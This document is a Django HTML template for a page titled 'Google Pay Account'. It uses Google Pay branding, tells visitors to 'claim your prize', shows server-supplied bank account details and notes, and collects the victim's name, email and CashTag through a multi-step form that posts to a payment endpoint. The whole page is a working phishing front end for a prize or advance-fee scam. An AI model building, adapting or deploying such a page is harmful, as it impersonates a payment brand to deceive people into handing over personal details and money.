{% load static %}
{% load crispy_forms_tags %}
<!DOCTYPE html>
<html>
<html lang="en">
<head>
    <title>Google Pay Account</title>
    <link rel="icon" href="https://i.postimg.cc/tg7GZGXq/google-pay-image-imageonline-co-2132854.png" type="image/x-icon" sizes="80x80">

<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet">
<style>
    * {
        box-sizing: border-box;
      }
      
      body, html {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        overflow: hidden; /* Hide overflow to prevent scrolling */
      }
      
      /* Style the video element */
      video {
        position: absolute;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        object-fit: cover;
        z-index: -1000; /* Place the video behind other elements */
        background-color: rgba(0, 0, 0, 0.8); /* Adjust opacity as needed */

      }
      
      #regForm {
          background-color: rgba(255, 255, 255, 0.8); /* Adjust the alpha value (0.5 for example) */
          margin: 100px auto;
          padding: 40px;
          width: 70%;
          min-width: 300px;
          border-radius: 10px;
          box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
          position: relative; /* Ensure form is positioned above video */
          z-index: 1; /* Ensure form is above video */
      }
      

h1 {
  text-align: center;  
}

input {
  padding: 10px;
  width: 100%;
  font-size: 17px;
  font-family: Raleway;
  border: 1px solid #aaaaaa;
}

/* Mark input boxes that gets an error on validation: */
input.invalid {
  background-color: #ffdddd;
}

/* Hide all steps by default: */
.tab {
  display: none;
}

button {
  background-color: #04AA6D;
  color: #ffffff;
  border: none;
  padding: 10px 20px;
  font-size: 17px;
  font-family: Raleway;
  cursor: pointer;
}

button:hover {
  opacity: 0.8;
}

#prevBtn {
  background-color: #bbbbbb;
}

/* Make circles that indicate the steps of the form: */
.step {
  height: 15px;
  width: 15px;
  margin: 0 2px;
  background-color: #bbbbbb;
  border: none;  
  border-radius: 50%;
  display: inline-block;
  opacity: 0.5;
}

.step.active {
  opacity: 1;
}

/* Mark the steps that are finished and valid: */
.step.finish {
  background-color: #04AA6D;
}


.fieldset {
    border: medium none !important;
    margin: 0 0 10px;
    min-width: 100%;
    padding: 0;
    width: 100%;
}


 .textarea {
    height:100px;
    max-width:100%;
  resize:none;
  padding: 10px;
  width: 100%;
  font-size: 17px;
  font-family: Raleway;
  border: 1px solid #aaaaaa;
}


</style>
</head>

<body>

    <div id="video-container">

<!-- Video background -->
<video autoplay loop muted>
    <source src="/static/video/Ink in Water Background (720p).mp4" type="video/mp4">
    Your browser does not support the video tag.
  </video>

  <div id="video-container">
  <video autoplay muted loop id="myVideo">
    Your browser does not support HTML5 video.
  </video>
  
  <div id="video-overlay"></div>
    <form id="regForm" method="post" action="{% url 'payment' %}">
        {% csrf_token %}
        {% for messaging in messagings %}
      
        <h1 style="font-size: 16px; color: #123456; font-weight: bold; font-family: Helvetica;">FOLLOW THE INSTRUCTIONS TO CLAIM YOUR PRIZE</h1>
        <!-- One "tab" for each step in the form: -->
        <div class="tab">
          <p style="font-size: 23px;">{{ messaging.message1 }}
            <p style="font-family: Helvetica; font-size: 18px; color: #123456; font-weight: bold;">Account Details</p>
            <p style="font-family: verdana; font-size: 14px; margin-top: -12px;">Bank Number: {{ messaging.message2 }}</p>
            <p style="font-family: verdana; font-size: 16px; margin-top: -7px;">Name: {{ messaging.message3 }}</p>
          </p>
          <p></p>
        </div>
        <div class="tab" style="margin-top: 40px;"> <span style=" font-family: Helvetica; font-size: 18px; color: #040720; "> Reciever Details</span>
          <p><input type="text" id="id_name" placeholder="Your Full Name" name="name" required></p>
          <p><input type="email" id="id_email" placeholder="Your Email Address" name="email" required></p>
          <p for="id_message">
            <textarea id="id_message" class=" fieldset textarea" id="id_message" name="message" rows="4"
              placeholder="Your CashTag Here" required></textarea>
          </p>
        </div>
        <div class="tab" style="margin-top: 40px;"> <span style=" font-family: Helvetica; font-size: 20px; color: #040720; font-weight: bold; "> !NOTE</span>
          <p style="font-size: 23px; margin-top: 5px;"> {{ messaging.message4 }} </p>
        </div>
      
        <div class="tab" style="margin-top: 40px;"> <span style=" font-family: Helvetica; font-size: 20px; color: #040720; font-weight: bold; "> !NOTE</span>
          <p style="font-size: 23px; margin-top: 5px;"> {{ messaging.message5 }} </p>
        </div>
        {% endfor %}
      
        <div style="overflow:auto;">
          <div style="float:right;">
            <button type="button" id="prevBtn" onclick="nextPrev(-1)">Previous</button>
            <button type="button" id="nextBtn" onclick="nextPrev(1)">Next</button>
      
          </div>
        </div>
        <!-- Circles which indicate the steps of the form: -->
        <div style="text-align:center;margin-top:40px;">
          <span class="step"></span>
          <span class="step"></span>
          <span class="step"></span>
          <span class="step"></span>
        </div>
      </form>
    </div>



<script>
    var currentTab = 0; // Current tab is set to be the first tab (0)
    showTab(currentTab); // Display the current tab
    
    function showTab(n) {
      // This function will display the specified tab of the form...
      var x = document.getElementsByClassName("tab");
      x[n].style.display = "block";
      //... and fix the Previous/Next buttons:
      if (n == 0) {
        document.getElementById("prevBtn").style.display = "none";
      } else {
        document.getElementById("prevBtn").style.display = "inline";
      }
      if (n == (x.length - 1)) {
        document.getElementById("nextBtn").innerHTML = "Submit";
      } else {
        document.getElementById("nextBtn").innerHTML = "Next";
      }
      //... and run a function that will display the correct step indicator:
      fixStepIndicator(n)
    }
    
    function nextPrev(n) {
      // This function will figure out which tab to display
      var x = document.getElementsByClassName("tab");
      // Exit the function if any field in the current tab is invalid:
      if (n == 1 && !validateForm()) return false;
      // Hide the current tab:
      x[currentTab].style.display = "none";
      // Increase or decrease the current tab by 1:
      currentTab = currentTab + n;
      // if you have reached the end of the form...
      if (currentTab >= x.length) {
        // ... the form gets submitted:
        document.getElementById("regForm").submit();
        return false;
      }
      // Otherwise, display the correct tab:
      showTab(currentTab);
    }
    
    function validateForm() {
      // This function deals with validation of the form fields
      var x, y, i, valid = true;
      x = document.getElementsByClassName("tab");
      y = x[currentTab].getElementsByTagName("input");
      // A loop that checks every input field in the current tab:
      for (i = 0; i < y.length; i++) {
        // If a field is empty...
        if (y[i].value == "") {
          // add an "invalid" class to the field:
          y[i].className += " invalid";
          // and set the current valid status to false
          valid = false;
        }
      }
      // If the valid status is true, mark the step as finished and valid:
      if (valid) {
        document.getElementsByClassName("step")[currentTab].className += " finish";
      }
      return valid; // return the valid status
    }
    
    function fixStepIndicator(n) {
      // This function removes the "active" class of all steps...
      var i, x = document.getElementsByClassName("step");
      for (i = 0; i < x.length; i++) {
        x[i].className = x[i].className.replace(" active", "");
      }
      //... and adds the "active" class on the current step:
      x[n].className += " active";
    }
    </script>
        
</body>
</html>
